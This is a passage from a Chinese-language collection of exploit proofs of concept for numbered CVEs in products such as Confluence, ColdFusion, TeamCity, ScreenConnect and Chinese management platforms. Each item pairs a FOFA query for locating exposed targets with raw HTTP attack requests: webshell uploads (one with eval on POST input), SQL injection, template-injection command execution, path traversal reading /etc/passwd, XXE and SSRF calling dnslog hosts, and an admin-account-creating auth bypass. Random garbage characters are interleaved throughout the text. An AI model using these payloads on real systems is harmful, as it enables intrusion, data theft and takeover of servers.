Te: trailers1 C) q/ L; n8 |. M7 f
Connection: close
/ H% J& P6 F) P, p4 F
' C9 l. I9 L% }$ _: a Rsrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456/ G7 K( t8 {$ a7 i; D, z
+ s4 m7 ]/ x/ w
- M& e- W: l: [9 ~/ A120. 北京百绰智能S40管理平台导入web.php任意文件上传
8 A9 R: n c) Q/ d8 Y6 eCVE-2024-1253
$ H$ p3 @* R% G; b9 v* y0 zFOFA:title="Smart管理平台"* L- F7 O- U' ]# Q4 {+ T
POST /useratte/web.php? HTTP/1.1
# i* _% a; M9 t0 M& SHost: ip:port7 i4 `2 {& X0 h" w
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db7 D4 Q3 m. H b3 V. Z
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko4 ^! W1 A. }! W* G# P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8# T" E8 w7 p4 F* O
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( W; B) f6 e" ]( L& |Accept-Encoding: gzip, deflate
% @, ?/ w. P% Y$ d% K0 hContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
9 N# [+ [+ L% p: Q6 P/ FContent-Length: 597
2 q% d# V7 n, M4 x& `- N0 EOrigin: https://ip:port# s# R1 c/ B( B% q5 i1 }4 S
Referer: https://ip:port/sysmanage/licence.php
% w* U: z& }& F" R! O) K: d2 TUpgrade-Insecure-Requests: 1
7 g% B0 e* s! n4 _1 \: eSec-Fetch-Dest: document
+ U/ T6 t0 P1 ~* A- ZSec-Fetch-Mode: navigate; ?2 w1 c6 a9 w6 t+ R0 R/ N
Sec-Fetch-Site: same-origin& ~% @5 [* _! l( m- N3 T# O
Sec-Fetch-User: ?1
$ r8 d9 x% Y7 a0 f' ZTe: trailers
- m# G9 ~$ I5 L" j' T& [Connection: close
1 d5 Q2 s7 ?$ S1 g" a5 @0 p
5 ^6 {% v- j: _' K6 H0 P+ w! {* @( N-----------------------------423289041236658752706300793288 L: [; {4 Y8 l: X" l' e9 `0 h# P
Content-Disposition: form-data; name="file_upload"; filename="2.php"
7 e6 t% m) j, |$ a4 u# N0 X+ z( u4 KContent-Type: application/octet-stream5 d. M1 Y1 R' m' j# b
+ d9 L3 y/ b1 H5 S* O5 Q
<?php phpinfo()?>6 o% n; u! w( K* ^& J v/ b! L
-----------------------------42328904123665875270630079328( s3 S5 V9 ]0 h% N' b
Content-Disposition: form-data; name="id_type"6 D- x" f e( C6 `9 w9 o. c
- C' D" L' g- t2 a l5 |* ~
1
8 L" b; @% l0 h, b- O, h4 ^-----------------------------42328904123665875270630079328# R/ l6 N2 ?9 \5 V* k$ K9 O
Content-Disposition: form-data; name="1_ck"2 p! C6 G& H$ ^: e) [9 T
3 ?& d0 y. @ P+ E4 ?9 X
1_radhttp
9 g. Z4 _. h6 _+ u; Z2 c-----------------------------42328904123665875270630079328, b, H3 B) ]* d- V# c3 ?4 \
Content-Disposition: form-data; name="mode"
/ {9 ?: ~& e, ?% q6 g# n0 u
' x7 g) P) s) S. m, q3 V4 limport
/ H+ O+ J, s" G' i-----------------------------423289041236658752706300793288 q. S; e! Q4 I& d$ P5 P- g+ F
! ^6 m. `9 d7 i: S' A4 X) j6 ~1 y8 I' j- ?, p
文件路径/upload/2.php
1 X0 Y g; P" @# v+ [9 m# N3 ?6 {
- W, m( I i5 t4 h {& i2 W- L121. 北京百绰智能S42管理平台userattestation.php任意文件上传/ L8 n: ? V( i! {8 C
CVE-2024-1918$ h9 W5 _% z; a* x
FOFA:title="Smart管理平台"
0 ~; q" v+ ^( K, Q" s4 N4 C$ sPOST /useratte/userattestation.php HTTP/1.1# D `/ ?- @2 M+ l3 [% a! p
Host: 192.168.40.130:8443+ y+ ]2 m7 l+ T; H
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50+ a, ]9 \' F9 x/ v$ I8 B
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
7 z" q! Z' ^5 JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8# P4 d$ j8 j" W+ a/ P$ \
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. p+ `: q h) C, l( \
Accept-Encoding: gzip, deflate
6 E2 j3 I6 P8 L: x2 L. u, _0 ]% {Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328" m7 H- Z% ?3 s. e! K7 d
Content-Length: 592
0 F& H3 E. y9 j# jOrigin: https://192.168.40.130:8443( K, q# n* a0 _$ @0 Q
Upgrade-Insecure-Requests: 1
7 b; [$ ~; B( CSec-Fetch-Dest: document8 u/ S' i0 E: i9 D/ J
Sec-Fetch-Mode: navigate
8 e* O( v8 ^0 h5 R/ t# sSec-Fetch-Site: same-origin/ K8 l5 D" c1 @+ E
Sec-Fetch-User: ?11 S( D6 k, r; r! I, U% k, s
Te: trailers* M! W+ P. F! N+ m8 X2 O
Connection: close5 H3 [" M- P" `$ q, N
( I5 H) m- c' k: J1 [) z- u9 z, i: x
-----------------------------42328904123665875270630079328
" M1 C% k6 v+ Q/ O3 T9 n) f! `Content-Disposition: form-data; name="web_img"; filename="1.php"
' O/ m$ G- z; GContent-Type: application/octet-stream
; [+ I( M* e7 p) r: a1 i7 \# r( }( U9 |1 |* H: y( Z; _
<?php phpinfo();?>$ l C0 x, X) I. ^: g A6 n
-----------------------------42328904123665875270630079328
& h/ X+ G( J; g; A6 @Content-Disposition: form-data; name="id_type"% U% y$ b. A G7 ~! o/ V& x1 @+ y
9 E* b# w) t" s6 x: d) v; F, A* G
1, b8 `. W `2 o0 r7 E6 ~
-----------------------------42328904123665875270630079328
) }' E* a4 R/ M) ^1 I2 BContent-Disposition: form-data; name="1_ck"* e S3 b9 J: n
8 C8 G. W( |! \4 J. ^3 _. L
1_radhttp
R/ H: B; w3 F5 e, J. R2 ]-----------------------------42328904123665875270630079328 `% k" i% o: [0 Q0 v( d$ O% d2 `
Content-Disposition: form-data; name="hidwel"; `; V( U7 a+ z5 D; s6 y
+ e( Y! H$ i4 q6 W! s! ~
set2 ]: {& T4 o1 o+ V% }
-----------------------------42328904123665875270630079328 [ x" R6 H! R5 B) r
: h) \. Y2 K8 }( Z5 ?& @- c
. N4 G/ S7 \4 p( O2 K, I9 Sboot/web/upload/weblogo/1.php4 |8 V$ U/ n& R" j" @1 f
`$ P) X1 h' m122. 北京百绰智能s200管理平台/importexport.php sql注入
7 R& y7 b$ m" o; DCVE-2024-27718FOFA:title="Smart管理平台"5 F6 {4 t& e6 t7 L( _4 h" r
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()# W. @* @, n. l8 S/ N @: y7 y
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
( p+ K3 k6 {# h# dHost: x.x.x.x
% S% \) X8 d5 Q- f0 BCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc04 h" X: ?3 `0 u6 H5 O( t* `, G0 K) D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0# S! Z3 s3 @! v. F. `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
1 u, A5 {+ e+ I2 h# c) E( @/ Z4 b. MAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 t8 Q$ z6 `: V6 s- H: J3 U
Accept-Encoding: gzip, deflate, br; \0 T: Q% n! a+ N' w: e, ]& B
Upgrade-Insecure-Requests: 1
, U) V! T; I$ h! a3 U' ~Sec-Fetch-Dest: document
0 U; P* D, {: f6 M3 e$ SSec-Fetch-Mode: navigate
, s5 \; G" E# t' YSec-Fetch-Site: none
; N, L6 n: G6 ^2 {" [- O7 {Sec-Fetch-User: ?1+ o8 g% L6 `2 j/ m
Te: trailers6 s: R v/ u! n0 e5 |$ d8 L
Connection: close+ p7 V4 y6 D, I V9 B9 G7 l
$ [: ?' X8 {- H7 p8 t0 {
0 P5 }( l r7 N" d& k( Z6 \
123. Atlassian Confluence 模板注入代码执行3 D7 ^! P( H* d8 s D& {
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
3 b" ~: B& V" _& Y9 bPOST /template/aui/text-inline.vm HTTP/1.1
1 f9 d" T- `1 y6 f- lHost: localhost:80909 j8 T& p. X; R! |% |! z) p g6 _
Accept-Encoding: gzip, deflate, br
% `9 b, d% O( N" P: ^Accept: */*
2 z0 L1 R1 v; S7 T! T0 r* uAccept-Language: en-US;q=0.9,en;q=0.8' T& K. o# d$ l- u; @* u: W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.368 _' f2 |8 J8 @! T
Connection: close% D; E5 E. F* W- B7 J% P
Content-Type: application/x-www-form-urlencoded" @( n5 C. X8 x. ~) z
' |/ b# }/ f1 p4 l' @
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))1 D( e3 }- C. |2 ]9 ]
4 [2 Q4 s0 T! U& g3 V J, `3 \2 O% T" P# v
124. 湖南建研工程质量检测系统任意文件上传
$ O- ]2 F; F" p* x) h+ ?FOFA:body="/Content/Theme/Standard/webSite/login.css"9 l- s. E [! I2 e9 G
POST /Scripts/admintool?type=updatefile HTTP/1.14 }5 b6 |: x5 K' \2 e: l
Host: 192.168.40.130:8282( {$ @7 V; y5 T: {
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36/ z' E" C4 s9 J$ C
Content-Length: 72( C {2 I9 G3 p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
% e8 B% `; }# OAccept-Encoding: gzip, deflate, br
* M/ Z: J/ g ^" p" O8 [& kAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# o2 }3 _. b" C4 y+ n
Connection: close5 i' N4 j- r+ u
Content-Type: application/x-www-form-urlencoded
& ?5 Z' Y2 X, @ g- I/ ?* W
+ x+ C n5 ?% g% q7 m9 EfilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
0 }4 @3 x7 `/ D+ c) a% }
$ {; z! w& t3 J- ]9 Q/ n
( w0 G0 A6 B! E6 `; s, Fhttp://192.168.40.130:8282/Scripts/abcgcg.aspx
" V) z+ r; k k( A! b
% ^! ?% }$ c' k" F" E/ O- o125. ConnectWise ScreenConnect身份验证绕过6 [9 v* J0 l- w
CVE-2024-1709& y1 R; ^- L/ H1 k* l8 j
FOFA:icon_hash="-82958153"
1 u* h# n7 d3 D& w% ]- p( [# b/ Khttps://github.com/watchtowrlabs ... bypass-add-user-poc
6 H* |) E- l; C% `# c! D" P' C. ?/ u4 U) }# j4 D, m5 ~
( | D6 Y, x8 U
使用方法
u1 _0 A+ x+ z* }python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!# a, L |) ?3 Y6 n
* g; q" `8 T9 w1 }, \" T! S/ \
; r6 m3 w6 w% { b" v. M创建好用户后直接登录后台,可以执行系统命令。! |3 D3 j; m6 @5 \9 E
% Q+ J8 d- Z( e1 x1 K126. Aiohttp 路径遍历
6 |0 b B5 I! G0 XFOFA:title=="ComfyUI"
2 i. h1 s2 \8 m; o+ \6 G! lGET /static/../../../../../etc/passwd HTTP/1.1& {- c, j z3 _8 f6 b
Host: x.x.x.x* v: {6 o9 m: b+ F) ^, i A G
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
2 y5 O7 \$ |0 Q+ H7 e7 JConnection: close9 {3 M1 U8 {* D3 O6 @- J: y
Accept: */*
, M/ L* x! M" a9 H4 O' A7 w% z2 d8 jAccept-Language: en
- A9 w* P7 y( y8 @ ]Accept-Encoding: gzip" L9 w' _& F1 c2 Y+ Q E2 Z! q
4 p ?. f& A! g2 w8 G
: m6 S* D( V# z( C' f4 L
127. 广联达Linkworks DataExchange.ashx XXE$ L% O. k" b. t6 n/ x( E' j
FOFA:body="Services/Identification/login.ashx"
! U* g* D' m6 s* t! d) nPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
+ ? b, z' \: ~2 GHost: 192.168.40.130:8888* ?( e3 H7 c, z+ B5 T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
. V) m; M! w) P+ @) S- GContent-Length: 415. k4 [+ Q, ~" u O, A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1 I5 M1 w* ~: j- VAccept-Encoding: gzip, deflate. I' w/ P) C3 Y, G
Accept-Language: zh-CN,zh;q=0.91 p" w E- U9 E% i% c* e$ s9 I
Connection: close
7 R8 Y; e/ X+ X aContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe02 A+ ?2 D( P3 F! h( `- B
Purpose: prefetch
& @7 F: p! r& O! kSec-Purpose: prefetch;prerender5 X; F- r/ o# D; Z6 Y
& B+ X+ T1 h1 ?6 `------WebKitFormBoundaryJGgV5l5ta05yAIe0. u% L& c Y" G# D0 P5 a8 J
Content-Disposition: form-data;name="SystemName"
9 v$ C) n4 F* r9 }5 Z4 [4 d+ v7 _4 }1 l9 t8 K- f4 o5 b
BIM
1 Z5 s5 w2 O! T" c------WebKitFormBoundaryJGgV5l5ta05yAIe0! a7 h, u! v/ W2 |4 s7 f
Content-Disposition: form-data;name="Params"9 y6 M9 O. D2 F# Z0 n
Content-Type: text/plain4 n2 t" V* b% d& N( a3 L1 Q- b
/ o& Q0 y" k5 z, B7 T2 W
<?xml version="1.0" encoding="UTF-8"?>- P2 q4 w" n4 Y1 w6 `
<!DOCTYPE test [/ b7 T( }; S1 V# {9 B" j
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">4 D# W6 F6 n2 E2 Q3 o
]
7 J7 c+ }, k( K6 ?* n8 i& S- x>
& s, \9 `& r- S6 ^. L- y: R<test>&t;</test>
. A7 R) v" t/ V4 W1 l------WebKitFormBoundaryJGgV5l5ta05yAIe0--+ x) v; D4 n7 H: i
. ~3 r& \7 k' m" s6 U v8 L8 U) a* V8 h) _6 |
; X9 N7 S5 ]7 w/ D; I
128. Adobe ColdFusion 反序列化
! F8 w, h; p) v7 F: K8 vCVE-2023-38203
! s- F9 K' k# W% G7 e+ Q% ]) H8 dAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)" e) f" B: |8 h9 B B" q: J r
FOFA:app="Adobe-ColdFusion") n/ T8 e4 T4 i/ B& C
PAYLOAD- N( G5 |( w0 E( R! A, W3 s
$ \& D1 E5 |4 T6 f; T( M129. Adobe ColdFusion 任意文件读取% W: a# k! H, U5 _4 @6 {! Z0 i
CVE-2024-20767
8 Z `7 x! C4 rFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"7 T# @! X P# o; @; E0 x. G
第一步,获取uuid' ?) [% n* L5 u3 x' d8 t1 X
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
) e! }2 q, V3 L0 v) wHost: x.x.x.x7 g4 V7 K$ Q$ J' w" H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
' ]1 x- z4 U' t2 J( @2 P/ [Accept: */*
$ c$ q2 h2 w7 d1 nAccept-Encoding: gzip, deflate
0 n& H5 \2 U# e( O- g$ m$ o! SConnection: close3 w( G, I$ c }" A7 d
9 x0 X: ~# f( M( ~& h; e& L! h6 \! i/ S+ K( H
第二步,读取/etc/passwd文件2 X' ~; [( z% K( X7 @% E
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.17 E3 t, f* W4 p: l" q$ p
Host: x.x.x.x- F& ]2 y. x7 a6 S6 h; i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
6 N; {& _% n. K8 j& YAccept: */*
* S) D. R* R1 wAccept-Encoding: gzip, deflate& O r8 V- p# J0 |* O
Connection: close
2 U/ C4 b k$ b5 c! n$ yuuid: 85f60018-a654-4410-a783-f81cbd5000b9
6 ]# T, H; W! f1 t/ R' @$ _4 |) a0 ~# `/ f7 ~* B6 |% @+ p7 e2 [
e' |' P8 }& v$ p5 N* p* W' H
130. Laykefu客服系统任意文件上传
8 D. `) ^- m. k( g, ]& g8 VFOFA:icon_hash="-334624619": D$ n; H+ }: a
POST /admin/users/upavatar.html HTTP/1.1+ A- H" }* l: }7 g" C" {
Host: 127.0.0.1! y8 @+ f* D/ F- h" T
Accept: application/json, text/javascript, */*; q=0.01
O% j j/ O5 \( g' f; GX-Requested-With: XMLHttpRequest
! y9 H. j) t4 `$ ^) ]4 C! XUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26- Z7 F7 w0 c$ u: G
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR3 ` g, D" v; H# T9 u+ Q3 C
Accept-Encoding: gzip, deflate
/ V7 w; A4 S# j3 G+ }9 uAccept-Language: zh-CN,zh;q=0.9$ ?) O! s7 q4 K% ^" M2 U
Cookie: user_name=1; user_id=3* z# i0 g. n. Z8 m7 Z9 K0 A: X
Connection: close
1 U5 n$ N0 }5 e+ p) E/ H# G, a
" v' G: E9 U0 E6 e7 C------WebKitFormBoundary3OCVBiwBVsNuB2kR
& @$ Z( e* E8 E% u0 P BContent-Disposition: form-data; name="file"; filename="1.php"
, \ T4 J/ `7 Z" h; }! k% rContent-Type: image/png4 E. ?$ C& W4 I& Y$ U% d" R0 Y
( j& @- \% a# u3 O; r1 k% Q- e9 f
<?php phpinfo();@eval($_POST['sec']);?>0 c9 Q* q6 _( m: r1 r. \
------WebKitFormBoundary3OCVBiwBVsNuB2kR--
, V7 R' E% Y" m: T( d# Q* P
8 K6 l7 W9 R3 O& D- m. U
' N/ @. X7 \/ I7 |* t* B% S( V* q131. Mini-Tmall <=20231017 SQL注入* I9 m! s% T% y* I" W
FOFA:icon_hash="-2087517259"8 J" d, V. g& P' J
后台地址:http://localhost:8080/tmall/admin/ [, j) _4 @4 l6 u8 M! X
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)5 J/ T8 d7 K; E, K9 c2 c% L
) a- k. Z' P( T
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过! ?# P" Z; ]9 |) R0 Q
CVE-2024-27198
3 q7 K0 J1 d; {6 L+ N% u PFOFA:body="Log in to TeamCity": Z' g3 ^3 T2 C& s
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.12 [0 m- S. I2 @1 A* d8 ]. l
Host: 192.168.40.130:8111) h& N/ t/ i: k3 A* z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
4 ~- s0 B4 a2 {9 Q0 a/ KAccept: */*
: }' X( U7 y7 K+ Y* q' n2 A: I, y( U: oContent-Type: application/json7 C9 `3 V' ^0 a' b
Accept-Encoding: gzip, deflate: ^! l9 l4 @3 f
# m) I0 D/ O/ e6 s
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}1 S# a8 n9 J" z0 a! `( |
8 S& ?; c! \4 \7 I; Q/ ~
* d$ e! T# C+ oCVE-2024-27199* p7 ?3 \4 L B* H
/res/../admin/diagnostic.jsp$ j3 {* i# M3 E" N8 i
/.well-known/acme-challenge/../../admin/diagnostic.jsp3 k/ E3 Y8 \6 H& n, |
/update/../admin/diagnostic.jsp/ d8 p! O# @# e: P9 Q$ L
1 X8 |8 R: C) y7 y: k
4 M8 [4 J- a; `, H. I* k( g
CVE-2024-27198-RCE.py
. r9 X, s6 L+ Y" u
* E+ Z+ e. ^, [+ p) t! I5 \133. H5 云商城 file.php 文件上传
0 x v$ Z' q' ]: }6 e; \8 |7 SFOFA:body="/public/qbsp.php"
' w z) R+ {% W2 Z( ?POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
: h1 w& o) M# ]* f$ g* j9 ` AHost: your-ip
* {0 v5 m5 ~$ l5 f" B8 _User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36) O8 v. z) h6 T) [
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx i% k# F3 s, C; ?4 A
6 U5 [' S/ ^) b
------WebKitFormBoundaryFQqYtrIWb8iBxUCx
# K3 l+ f: S( f' ?6 ~5 x) k# B- t1 \' MContent-Disposition: form-data; name="file"; filename="rce.php"
& L) l" v7 Y( ]3 x* u4 ^+ ZContent-Type: application/octet-stream3 `! t& ]- m7 `- r" F
4 a1 t4 n, T+ J6 u6 N3 e<?php system("cat /etc/passwd");unlink(__FILE__);?>
* V. ^0 m" I$ x9 I) x* S8 ]------WebKitFormBoundaryFQqYtrIWb8iBxUCx--9 Z/ j" P- U t8 L; X
# ~9 G8 A0 h Q- j+ c5 i( z$ p
) _, `; a) A' L( i& X" Y3 [8 V) @4 h/ w, z s0 k; W' x8 g B
134. 网康NS-ASG应用安全网关index.php sql注入1 I, |0 @1 I! ?; p8 Z9 r& V1 O
CVE-2024-23306 N0 Q W0 l0 g
Netentsec NS-ASG Application Security Gateway 6.3版本% W5 [/ x9 S2 L( {. R
FOFA:app="网康科技-NS-ASG安全网关"7 v/ F3 ~% f5 B
POST /protocol/index.php HTTP/1.1
+ @) X% [1 @: G1 M: rHost: x.x.x.x$ A: V. l: V1 U* F& l
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
# Y4 g& k- ?$ e! c4 i/ H" P& i0 e) iUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
4 h: I5 I |: \6 VAccept: */*7 f" T: g% z7 v2 c* `
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# e `* g) g. n9 A( Q4 B
Accept-Encoding: gzip, deflate; v8 H3 a. e) X _; H0 t. x
Sec-Fetch-Dest: empty# ^& z- t9 ]- h( E* k( \
Sec-Fetch-Mode: cors! @3 q `0 _" t
Sec-Fetch-Site: same-origin z) W e! w" e/ Q1 q
Te: trailers
0 {5 F8 T# R3 o- R4 eConnection: close! ]5 u# z* P" L# n2 S( w
Content-Type: application/x-www-form-urlencoded. p* H g' `. T- b+ f, n: {
Content-Length: 263# O9 q4 q9 N n. h$ G1 U
- @* T- d3 `6 F3 J1 f$ H1 S$ ?* \+ Kjsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
# D4 G9 U9 @* t: ?: @
7 l" f* w% e9 ]# @; C2 \
# T9 @4 \% b# v' d135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
1 a; P e' ~8 B- c* R, U, D0 ^CVE-2024-2022
R3 d% G- r& f b. ~/ JNetentsec NS-ASG Application Security Gateway 6.3版本
* {$ e1 w: q3 v2 YFOFA:app="网康科技-NS-ASG安全网关"3 j: L( n: ?* F- P
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1$ P# @- r0 n5 g+ \/ L
Host: x.x.x.x2 I$ C- X8 U# t9 _1 `) E) O% M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36, w: ~% p3 v n% R
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.73 w+ L" Q) [9 o0 O- w6 h k7 r
Accept-Encoding: gzip, deflate7 j4 R* v3 J% u: ?9 w4 u+ `
Accept-Language: zh-CN,zh;q=0.9
$ [: B: I( o& f: }, I+ m- x* fConnection: close- V+ J# a- f& m( V4 }7 s
" }( O1 U0 } k6 c
% v) ^$ U4 Y6 [* X$ t, ?+ f136. NextChat cors SSRF! `+ E0 L% ~9 e, D
CVE-2023-497854 q. }8 L! @; `0 q7 M
FOFA:title="NextChat"
6 ?6 I, a8 w0 JGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1* [. }" `6 ^4 C- c7 _: v
Host: x.x.x.x:10000; h+ K2 Q8 x1 J+ H4 s9 B8 `3 w% X7 h
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36+ F, }4 A2 O+ z$ {8 W9 m
Connection: close
4 I/ R6 b& y/ j! [; a P4 OAccept: */*8 A: q! Y1 w$ H2 b; h7 i" g
Accept-Language: en
8 }; L7 a$ K$ Y5 V* ~2 u3 r$ QAccept-Encoding: gzip
; K0 y$ i7 `; G3 L' H! t1 s! B$ y4 W0 ~
1 `, [, \7 ^7 F$ n7 L2 \3 M137. 福建科立迅通信指挥调度平台down_file.php sql注入1 m$ F( { u6 `) x) r# X2 S
CVE-2024-2620
. @0 N( `6 `' i5 RFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"/ T0 Y, A8 {) Q' v" {9 x
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1" U& P/ B7 ?7 L6 W$ R4 A
Host: x.x.x.x3 g" P \2 f) E/ S0 O4 ]; w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
% `' k: G6 Q5 W: CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 M4 \2 z# v8 e# y% E8 W4 P) f* U q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 R1 \) u9 ]. j/ k' F+ e; w( j* G
Accept-Encoding: gzip, deflate, br
+ f3 w2 e, h2 G2 m4 B" G$ ZConnection: close
# u. C# G- E" c7 |" WCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
2 }1 U3 F1 i; B( B5 z! W9 R! TUpgrade-Insecure-Requests: 1" A3 [; s, u" L& f
& b K: o: i+ S" B7 P* W4 |: y$ R# \2 g4 Z0 v/ U9 e
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入, J! v0 L+ Q1 s" u& R
CVE-2024-26217 k: ~1 ?# w" R
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
x; P& `0 i9 eGET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.18 U2 [$ ]0 [9 x; x
Host: x.x.x.x+ y+ B) q. o$ ~6 u* ?7 n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0& M8 ^1 {. D6 g" a4 I- m4 T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8* c& A0 Q) H' e/ s/ K! q8 o
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
q9 B E% |6 }Accept-Encoding: gzip, deflate, br- `# k! X- Z% f( G4 P* ^5 Z
Connection: close2 p% q2 F! D3 [5 Q
Upgrade-Insecure-Requests: 1
( [3 v l2 y, `2 \8 P8 B7 z; h) H# b6 M @
" i; d( I1 {' `
139. 福建科立讯通信指挥调度平台editemedia.php sql注入1 B8 C% c0 A3 [. V
CVE-2024-2622
+ Q# b5 z3 e- V2 w; fFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
